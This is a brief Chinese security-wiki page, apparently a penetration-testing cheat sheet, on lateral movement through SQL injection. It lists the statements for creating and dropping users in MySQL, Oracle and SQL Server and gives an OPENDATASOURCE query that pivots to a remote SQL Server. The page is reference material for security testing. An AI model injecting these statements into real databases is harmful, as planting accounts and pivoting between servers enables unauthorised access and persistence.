首页>安全文库>SQL注入>SQL注入横向移动

SQL注入横向移动

横向移动允许渗透测试人员访问不同的功能/数据集,这些功能/数据不强制是特权账户。横向切换用户帐户将暴露不同的信息,并可能有助于攻陷更多特权用户。

MySQL

*需要特权用户

描述语句
创建用户CREATE USER ‘netspi’@’%’ IDENTIFIED BY ‘password’
删除用户DROP USER netspi

Oracle

描述语句
创建用户CREATE USER user IDENTIFIED by pass;
删除用户DROP USER user

SQL Server

*需要特权用户

描述语句
创建用户EXEC sp_addlogin ‘user’, ‘pass’;
删除用户EXEC sp_droplogin ‘user’;
链接抓取https://blog.netspi.com/sql-server-link-crawling-powerupsql/
作为当前服务连接到远程数据库–Requires sysadmin
SELECT * FROM OPENDATASOURCE(‘SQLNCLI’, ‘Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;’).master.dbo.sysdatabases
文章最后更新于 2021-09-22
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索